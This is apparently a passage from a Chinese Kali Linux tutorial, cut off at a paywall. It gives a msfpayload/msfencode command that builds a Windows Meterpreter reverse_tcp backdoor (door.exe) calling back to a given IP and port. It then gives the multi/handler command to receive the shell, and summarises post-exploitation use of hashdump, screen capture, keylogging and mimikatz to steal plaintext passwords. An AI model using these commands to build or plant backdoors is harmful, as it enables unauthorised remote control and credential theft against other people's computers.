使用示例:
1.生成Meterpreter后门
命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe
这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看方式如下
use exploit/multi/handler
用这个exp来接受返回的链接

本文介绍了如何在Kali Linux中生成和利用Meterpreter后门。通过设置LHOST和LPORT参数,将door.exe植入目标主机,然后在Kali上开启handler等待连接。成功连接后,可以使用Meterpreter的各种命令,如sysinfo、hashdump、screenshot、keyscan_start等进行系统信息查看、哈希抓取、屏幕截图和键盘记录。此外,还提及了扩展工具mimikatz和wdigest,它们能用于抓取明文密码和凭据。
最低0.47元/天 解锁文章
3174

被折叠的 条评论
为什么被折叠?



